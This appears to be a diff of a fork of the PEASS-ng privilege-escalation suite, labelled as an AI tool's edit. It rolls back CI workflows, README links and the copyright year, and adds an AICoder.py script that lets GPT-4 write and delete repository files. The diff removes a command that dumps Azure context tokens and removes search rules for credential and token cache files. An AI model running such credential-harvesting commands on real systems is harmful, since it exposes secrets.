File json2pdf.py modified by AICoder

2023-07-02 16:16:22 +00:00
981 changed files with 13020 additions and 89694 deletions
--- a/.github/workflows/CI-master_tests.yml
+++ b/.github/workflows/CI-master_tests.yml
@ -4,12 +4,11 @@ on:
  push:
    branches:
      - master
-      - main
    paths-ignore:
        - '.github/**'
  
  schedule:
-    - cron: "5 4 1 * *"
+    - cron: "5 4 * * SUN"

  workflow_dispatch:

@ -50,7 +49,7 @@ jobs:
      - name: run MSBuild
        run: msbuild $env:Solution_Path
        
-      # Execute all unit tests in the solution
+      # Execute all unit tests in the solution - It's broken :(
      #- name: Execute unit tests
      #  run: dotnet test $env:Solution_Path
        
@ -66,50 +65,6 @@ jobs:
            echo "build Any CPU"
            msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="Any CPU"
      
-      - name: Execute winPEAS -h
-        shell: pwsh
-        run: |
-          $Configuration = "Release"
-          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
-          if (Test-Path $exePath) {
-            & $exePath -h
-          } else {
-            Write-Error "winPEAS.exe not found at $exePath"
-          }
-
-      - name: Execute winPEAS cloudinfo
-        shell: pwsh
-        run: |
-          $Configuration = "Release"
-          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
-          if (Test-Path $exePath) {
-            & $exePath cloudinfo
-          } else {
-            Write-Error "winPEAS.exe not found at $exePath"
-          }
-
-      - name: Execute winPEAS systeminfo
-        shell: pwsh
-        run: |
-          $Configuration = "Release"
-          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
-          if (Test-Path $exePath) {
-            & $exePath systeminfo
-          } else {
-            Write-Error "winPEAS.exe not found at $exePath"
-          }
-      
-      - name: Execute winPEAS networkinfo
-        shell: pwsh
-        run: |
-          $Configuration = "Release"
-          $exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
-          if (Test-Path $exePath) {
-            & $exePath networkinfo
-          } else {
-            Write-Error "winPEAS.exe not found at $exePath"
-          }
-      
      # Copy the built versions
      - name: Copy all versions
        run: |
@ -144,47 +99,53 @@ jobs:
      
      # Upload all the versions for the release
      - name: Upload winpeasx64
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASx64.exe
          path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe
      
      - name: Upload winpeasx86
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASx86.exe
          path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe
      
      - name: Upload winpeasany
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASany.exe
          path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe
      
      - name: Upload winpeasx64ofs
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASx64_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
      
      - name: Upload winpeasx86ofs
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASx86_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
          
      - name: Upload winpeasanyofs
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEASany_ofs.exe
          path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
      
      - name: Upload winpeas.bat
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: winPEAS.bat
          path: winPEAS\winPEASbat\winPEAS.bat
      
+      - name: Upload winpeas.ps1
+        uses: actions/upload-artifact@v2
+        with:
+          name: winPEAS.ps1
+          path: winPEAS\winPEASps1\winPEAS.ps1
+          
      # Git add
      #- name: Create local changes
      #  run: |
@ -228,9 +189,7 @@ jobs:
        run: |
          python3 -m pip install PyYAML
          cd linPEAS
-          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
-          python3 -m builder.linpeas_builder --all-no-fat --output linpeas.sh
-          python3 -m builder.linpeas_builder --small --output linpeas_small.sh
+          python3 -m builder.linpeas_builder
      
      # Build linpeas binaries
      - name: Build linpeas binaries 
@ -248,35 +207,35 @@ jobs:
            
      # Run linpeas help as quick test
      - name: Run linpeas help
-        run: linPEAS/linpeas_fat.sh -h && linPEAS/linpeas.sh -h && linPEAS/linpeas_small.sh -h
+        run: linPEAS/linpeas.sh -h
      
      # Run linpeas as a test
      - name: Run linpeas system_information
-        run: linPEAS/linpeas_fat.sh -o system_information -a
+        run: linPEAS/linpeas.sh -o system_information -a
      
      - name: Run linpeas container
-        run: linPEAS/linpeas_fat.sh -o container -a
+        run: linPEAS/linpeas.sh -o container -a
      
      - name: Run linpeas cloud
-        run: linPEAS/linpeas_fat.sh -o cloud -a
+        run: linPEAS/linpeas.sh -o cloud -a
      
      - name: Run linpeas procs_crons_timers_srvcs_sockets
-        run: linPEAS/linpeas_fat.sh -o procs_crons_timers_srvcs_sockets -a
+        run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a
      
      - name: Run linpeas network_information
-        run: linPEAS/linpeas_fat.sh -o network_information -t -a
+        run: linPEAS/linpeas.sh -o network_information -t -a
      
      - name: Run linpeas users_information
-        run: linPEAS/linpeas_fat.sh -o users_information -a
+        run: linPEAS/linpeas.sh -o users_information -a
      
      - name: Run linpeas software_information
-        run: linPEAS/linpeas_fat.sh -o software_information -a
+        run: linPEAS/linpeas.sh -o software_information -a
      
      - name: Run linpeas interesting_perms_files
-        run: linPEAS/linpeas_fat.sh -o interesting_perms_files -a
+        run: linPEAS/linpeas.sh -o interesting_perms_files -a
      
      - name: Run linpeas interesting_files
-        run: linPEAS/linpeas_fat.sh -o interesting_files -a
+        run: linPEAS/linpeas.sh -o interesting_files -a
      
      # Too much time
      #- name: Run linpeas api_keys_regex
@ -284,57 +243,51 @@ jobs:
      
      # Upload files for release
      - name: Upload linpeas.sh
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas.sh
          path: linPEAS/linpeas.sh
      
      - name: Upload linpeas_fat.sh
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_fat.sh
          path: linPEAS/linpeas_fat.sh
      
-      - name: Upload linpeas_small.sh
-        uses: actions/upload-artifact@v4
-        with:
-          name: linpeas_small.sh
-          path: linPEAS/linpeas_small.sh
-      
      ## Linux bins
      - name: Upload linpeas_linux_386
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_linux_386
          path: sh2bin/builds/linpeas_linux_386
      
      - name: Upload linpeas_linux_amd64
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_linux_amd64
          path: sh2bin/builds/linpeas_linux_amd64
      
      - name: Upload linpeas_linux_arm
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_linux_arm
          path: sh2bin/builds/linpeas_linux_arm
          
      - name: Upload linpeas_linux_arm64
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_linux_arm64
          path: sh2bin/builds/linpeas_linux_arm64
      
      ## Darwin bins
      - name: Upload linpeas_darwin_amd64
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_darwin_amd64
          path: sh2bin/builds/linpeas_darwin_amd64
          
      - name: Upload linpeas_darwin_arm64
-        uses: actions/upload-artifact@v4
+        uses: actions/upload-artifact@v2
        with:
          name: linpeas_darwin_arm64
          path: sh2bin/builds/linpeas_darwin_arm64
@ -368,14 +321,14 @@ jobs:
      # Build linpeas
      - name: Build macpeas
        run: |
-          python3 -m pip install PyYAML --break-system-packages
-          python3 -m pip install requests --break-system-packages
+          python3 -m pip install PyYAML
+          python3 -m pip install requests
          cd linPEAS
-          python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
+          python3 -m builder.linpeas_builder
      
      # Run linpeas help as quick test
      - name: Run macpeas help
-        run: linPEAS/linpeas_fat.sh -h
+        run: linPEAS/linpeas.sh -h
      
      # Run macpeas parts to test it
      #- name: Run macpeas
@ -389,82 +342,77 @@ jobs:
    steps:
    # Download files to release
    - name: Download winpeasx64ofs
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASx64_ofs.exe

    - name: Download winpeasx86ofs
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASx86_ofs.exe

    - name: Download winpeasanyofs
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASany_ofs.exe

    - name: Download winpeasx64
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASx64.exe
    
    - name: Download winpeasx86
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASx86.exe

    - name: Download winpeasany
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEASany.exe
    
    - name: Download winpeas.bat
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: winPEAS.bat

    - name: Download linpeas.sh
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas.sh
    
    - name: Download linpeas_fat.sh
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_fat.sh

-    - name: Download linpeas_small.sh
-      uses: actions/download-artifact@v4.1.7
-      with:
-        name: linpeas_small.sh
-
    - name: Download linpeas_linux_386
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_linux_386

    - name: Download linpeas_linux_amd64
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_linux_amd64

    - name: Download linpeas_linux_arm
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_linux_arm

    - name: Download linpeas_linux_arm64
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_linux_arm64

    - name: Download linpeas_darwin_amd64
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_darwin_amd64

    - name: Download linpeas_darwin_arm64
-      uses: actions/download-artifact@v4.1.7
+      uses: actions/download-artifact@v2
      with:
        name: linpeas_darwin_arm64
    
--- a/.github/workflows/aicoder.yml
+++ b/.github/workflows/aicoder.yml
@ -0,0 +1,23 @@
+name: aicoder
+
+on:
+  workflow_dispatch:
+
+jobs:
+  Build_and_test_winpeas_master:
+    runs-on: ubuntu-latest
+
+    steps:
+      # checkout
+      - name: AICoder GH Action
+        uses: AICoderHub/GH_Action@v0.11
+        with:
+          INPUT_MODE: 'file-optimizer'
+          INPUT_PROMPT: ''
+          INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
+          INPUT_MODEL: 'gpt-4'
+          TEMPLATE_FILES: ''
+          ORIGIN_BRANCH: 'aicoder'
+          TO_BRANCH: 'master'
+          CHECK_PATH: './parsers/json2pdf.py'
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
--- a/.github/workflows/artifacts_cleanup.yml
+++ b/.github/workflows/artifacts_cleanup.yml
@ -1,14 +0,0 @@
-name: 'nightly artifacts cleanup'
-on:
-  schedule:
-    - cron: '0 6 * * 2' # At 6am on Tuesdays
-  workflow_dispatch:
-
-jobs:
-  delete-artifacts:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: kolpav/purge-artifacts-action@v1
-        with:
-          token: ${{ secrets.GITHUB_TOKEN }}
-          expire-in: 1days # Set this to 0 to delete all artifacts
--- a/.gitignore
+++ b/.gitignore
@ -1,5 +1,4 @@
 .vs/*
-.vscode/*
 winPEAS/winPEASexe/.vs/*
 v16/*
 winPEAS/winPEASexe/.vs/winPEAS/v16/*
@ -25,8 +24,6 @@ __pycache__
 linPEAS/builder/__pycache__/*
 linPEAS/builder/src/__pycache__/*
 linPEAS/linpeas.sh
-linPEAS/builder/linpeas_base_tmp.sh
-build_lists/regexes.yaml
 sh2bin
 sh2bin/*
 .dccache
--- a/AICoder.py
+++ b/AICoder.py
@ -0,0 +1,208 @@
+import argparse
+import os
+import sys
+import string
+import random
+from typing import List
+import openai
+import json
+import subprocess
+import tiktoken
+import requests
+from github import Github
+
+#########################
+#### OPENAI FUNCTIONS ###
+#########################
+
+def reportTokens(prompt, model="gpt-4"):
+    encoding = tiktoken.encoding_for_model(model)
+    print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
+
+def write_file(file_path: str, content: str):
+    """Write content to a file creating the needed directories first"""
+    os.makedirs(os.path.dirname(file_path), exist_ok=True)
+
+    with open(file_path, "w") as file:
+        file.write(content)
+
+def delete_file(file_path: str):
+    """Delete a file if it exists"""
+
+    if os.path.isfile(file_path):
+        os.remove(file_path)
+
+openai_available_functions = {
+    "write_file": write_file, "delete_file": delete_file
+}
+
+openai_functions = [
+    {
+        "name": "write_file",
+        "description": "Write a file giving the path and the content",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "file_path": {
+                    "type": "string",
+                    "description": "Path to the file to write",
+                },
+                "content": {
+                    "type": "string",
+                    "description": "Content to write in the file",
+                },
+            },
+            "required": ["file_path", "content"],
+        },
+    },
+    {
+        "name": "delete_file",
+        "description": "Delete a file",
+        "parameters": {
+            "type": "object",
+            "properties": {
+                "file_path": {
+                    "type": "string",
+                    "description": "Path to the file to write",
+                }
+            },
+            "required": ["file_path"],
+        },
+    }
+]
+
+
+#########################
+#### GIT FUNCTIONS ######
+#########################
+
+
+def create_pull_request(branch_name, commit_message, github_token):
+    github = Github(github_token)
+    repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])
+
+    # Create a new branch
+    base_branch = repo.get_branch(repo.default_branch)
+    repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)
+
+    # Commit changes to the new branch
+    subprocess.run(["git", "checkout", branch_name])
+    subprocess.run(["git", "add", "."])
+    subprocess.run(["git", "commit", "-m", commit_message])
+    subprocess.run(["git", "push", "origin", branch_name])
+
+    # Create a pull request
+    pr = repo.create_pull(
+        title=commit_message,
+        body="Generated by OpenAI Github Action",
+        head=branch_name,
+        base=repo.default_branch
+    )
+
+    return pr.html_url
+
+
+#########################
+#### FILE PROCESSING ####
+#########################
+
+
+def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
+    with open(file_path, "r") as file:
+        file_content = file.read()
+
+    messages = [
+        {"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
+        {"role": "user", "content": prompt},
+        {"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
+    ]
+    openai.api_key = api_key
+
+    reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")
+
+    response = openai.ChatCompletion.create(
+        model=model,
+        messages=messages,
+        temperature=0
+    )
+    response_message = response["choices"][0]["message"]
+
+     # Step 2: check if GPT wanted to call a function
+    if response_message.get("function_call"):
+        
+        function_name = response_message["function_call"]["name"]
+        fuction_to_call = openai_available_functions[function_name]
+        function_args = json.loads(response_message["function_call"]["arguments"])
+        fuction_to_call(**function_args)
+
+
+def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
+    responses = []
+    for root, _, files in os.walk(folder_path):
+        for file in files:
+            file_path = os.path.join(root, file)
+            response = process_file(prompt, api_key, file_path, model)
+            responses.append(response)
+
+
+#########################
+#### MAIN FUNCTION ######
+#########################
+
+
+def get_random_string(length):
+    # With combination of lower and upper case
+    letters = string.ascii_letters
+    result_str = ''.join(random.choice(letters) for i in range(length))
+    return result_str
+
+def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
+    if os.path.isfile(file_path):
+        process_file(prompt, api_key, file_path, model)
+    elif os.path.isdir(file_path):
+        process_folder(prompt, api_key, file_path, model)
+    else:
+        print("Error: Invalid file path.")
+        sys.exit(1)
+
+    try:
+        create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
+    except Exception as e:
+        print(f"Error: Failed to create pull request. {e}")
+        sys.exit(1)
+
+if __name__ == "__main__":
+    # Setup the argument parser
+    parser = argparse.ArgumentParser()
+
+    # Add arguments for prompt, api_key, file_path and github_token
+    parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
+    parser.add_argument('--api-key', default=None, type=str, help='Input API key')
+    parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
+    parser.add_argument('--github-token', default=None, type=str, help='Github token')
+    parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')
+
+    # Parse the arguments
+    args = parser.parse_args()
+    prompt = os.environ.get("INPUT_PROMPT", args.prompt)
+    api_key = os.environ.get("INPUT_API_KEY", args.api_key)
+    file_path = os.environ.get("INPUT_FILE_PATH", args.path)
+    github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
+    model = os.environ.get("INPUT_MODEL", args.model)
+
+    if not prompt or not api_key or not file_path:
+        print("Error: Missing required inputs.")
+        sys.exit(1)
+    
+    #if not github_token:
+    #    print("Error: Missing github token.")
+    #    sys.exit(1)
+
+    if os.path.exists(prompt):
+        with open(prompt, "r") as file:
+            prompt = file.read()
+    
+    if prompt.startswith("http"):
+        prompt = requests.get(prompt).text
+    
+    main(prompt, api_key, file_path, github_token, model)
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@ -1,19 +1,19 @@
 # Contributing to this repository

 ## Making Suggestions 
-If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/peass-ng/PEASS-ng/issues)**
+If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**

 ## Do don't know how to help?
-Check out the **[TODO](https://github.com/peass-ng/PEASS-ng/blob/master/TODO.md) page**
+Check out the **[TODO](https://github.com/carlospolop/PEASS-ng/blob/master/TODO.md) page**

 ## Searching for files with sensitive information
-From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** file.
+From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file.

-If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
+If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
 Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.

 ## Specific LinPEAS additions
-From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that will be merged into linpeas.sh*.
+From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*.
 The new linpeas.sh script will be auto-generated in the PR.

 ## Specific WinPEAS additions
--- a/2
+++ b/2
@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which peass-ng is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.

-peass-ng is (C) 2019-2024 Carlos Polop Martin.
+peass-ng is (C) 2006-2022 Carlos Polop Martin.

 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/README.md
+++ b/README.md
@ -1,6 +1,6 @@
 # PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

-![](https://github.com/peass-ng/PEASS-ng/raw/master/linPEAS/images/peass.png)
+![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/peass.png)

 ![](https://img.shields.io/badge/Black-Arch-black) ![](https://img.shields.io/badge/Arch-AUR-brightgreen) ![](https://img.shields.io/badge/Black%20Hat%20Arsenal-Asia%202020-red)

@ -12,29 +12,34 @@ Here you will find **privilege escalation tools for Windows and Linux/Unix\* and

 These tools search for possible **local privilege escalation paths** that you could exploit and print them to you **with nice colors** so you can recognize the misconfigurations easily.

- Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html)**
- **[WinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**
+- Check the **Local Windows Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation)**
+- **[WinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) - Windows local Privilege Escalation Awesome Script (C#.exe and .bat)**

- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**
- **[LinPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**
+- Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**
+- **[LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux local Privilege Escalation Awesome Script (.sh)**

 ## Quick Start
-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.

 ## JSON, HTML & PDF output
 Check the **[parsers](./parsers/)** directory to **transform PEASS outputs to JSON, HTML and PDF**

-## Join us!
+## Support PEASS-ng and HackTricks and get benefits

-If you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**
+Do you want to have **access the latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new [SUBSCRIPTION PLANS](https://github.com/sponsors/carlospolop?frequency=one-time) for individuals and companies**.
+
+**LinPEAS, WinPEAS and MacPEAS** aren’t enough for you? Welcome [**The PEASS Family**](https://opensea.io/collection/the-peass-family/), a limited collection of [**exclusive NFTs**](https://opensea.io/collection/the-peass-family/) of our favourite PEASS in disguise, designed by my team. Go **get your favourite and make it yours!** And if you are a **PEASS & Hacktricks enthusiast**, you can get your hands now on **our [custom swag](https://peass.creator-spring.com/) and show how much you like our projects!**

 You can also, join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts, or follow me on Twitter 🐦 [@hacktricks_live](https://twitter.com/hacktricks_live).

 ## Let's improve PEASS together

-If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/peass-ng/PEASS-ng/blob/master/CONTRIBUTING.md)** file.
+If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or contribute reading the **[CONTRIBUTING.md](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/CONTRIBUTING.md)** file.

 ## Advisory

 All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own machines and/or with the owner's permission.

+
+
+By Polop<sup>(TM)</sup>
--- a/TODO.md
+++ b/TODO.md
@ -1,7 +1,7 @@
 # TODO

 ### Generate Nice Reports
- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/peass-ng/PEASS-ng/tree/master/parser).
+- [x] Create a parser from linpeas and winpeas.exe output to JSON. You can fin it [here](https://github.com/carlospolop/PEASS-ng/tree/master/parser).
 - [ ] Create a python script that generates a nice HTML/PDF from the JSON output

 ### Generate a DB of Known Vulnerable Binaries
--- a/build_lists/regexes.yaml
+++ b/build_lists/regexes.yaml
@ -1,3 +1,2 @@
-# This is a placeholder
-# It will be replaced by the actual regexes.yaml file
-# generated by download-regexes.py or download-regexes.ps1 (execute it before building the tools)
+This is a placeholder.
+To fill this yaml execute one of the scripts download_regexes.py or download_regexes.ps1
--- a/build_lists/sensitive_files.yaml
+++ b/build_lists/sensitive_files.yaml
@ -1271,8 +1271,6 @@ search:
    value:
        config:
          auto_check: True
-          exec:
-            - '(pwsh -Command "Save-AzContext -Path /tmp/az-context3489ht.json" && cat /tmp/az-context3489ht.json && rm /tmp/az-context3489ht.json) || echo_not_found "pwsh"'

        files:
          #- name: "credentials"
@ -1381,54 +1379,13 @@ search:
                  - common

          - name: "AzureRMContext.json"
-            value:
-                bad_regex: "Id.*|Credential.*"
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "clouds.config"
-            value: 
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "service_principal_entries.json"
            value: 
                bad_regex: ".*"
                type: f
                search_in: 
                  - common
          
-          - name: "msal_token_cache.json"
-            value: 
-                bad_regex: ".*"
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "msal_http_cache.bin"
-            value: 
-                just_list_file: True
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "service_principal_entries.bin"
-            value: 
-                just_list_file: True
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "msal_token_cache.bin"
-            value: 
-                just_list_file: True
-                type: f
-                search_in: 
-                  - common
-          
-          - name: "ErrorRecords" #Azure logs can contain crentials
+          - name: "ErrorRecords" #Azure logs can contain creentials
            value: 
                type: d
                search_in: 
@ -1462,26 +1419,6 @@ search:
                search_in: 
                  - common
          
-          - name: "Google Cloud Directory Sync"
-            value: 
-                files:
-                  - name: "*.xml"
-                    value:
-                        bad_regex: "oAuth2RefreshToken.*|authCredentialsEncrypted.*"
-                type: d
-                search_in: 
-                  - common
-
-          - name: "Google Password Sync"
-            value: 
-                files:
-                  - name: "*.xml"
-                    value:
-                        bad_regex: "baseDN.*|authorizeUsername.*"
-                type: d
-                search_in: 
-                  - common
-          
  
  - name: Road Recon
    value:
@ -1501,7 +1438,7 @@ search:
        config:
          auto_check: True
          exec:
-            - ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.wiki/en/linux-hardening/freeipa-pentesting.html"; fi
+            - ipa_exists="$(command -v ipa)"; if [ "$ipa_exists" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting"; fi
        
        files:
          - name: "ipa"
--- a/linPEAS/README.md
+++ b/linPEAS/README.md
@ -1,10 +1,10 @@
 # LinPEAS - Linux Privilege Escalation Awesome Script

-![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)
+![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/linpeas.png)

-**LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html)**
+**LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)**

-Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.wiki](https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html)**.
+Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist)**.

 [![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566)

@ -12,28 +12,12 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks

 Just execute `linpeas.sh` in a MacOS system and the **MacPEAS version will be automatically executed**

-## Build your own linpeas!
-
-The latest version of linpeas allows you to **select the checks you would like your linpeas to have** and built it only with those checks!
-
-This allows to create **smaller and faster linpeas scripts** for stealth and speed purposes.
-
-Check how to **select the checks you want to build [in your own linpeas following this link.](builder)**
-
-Note that by default, in the releases pages of this repository, you will find a **linpeas with all the checks**.
-
-## Differences between `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
-
- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
-
 ## Quick Start
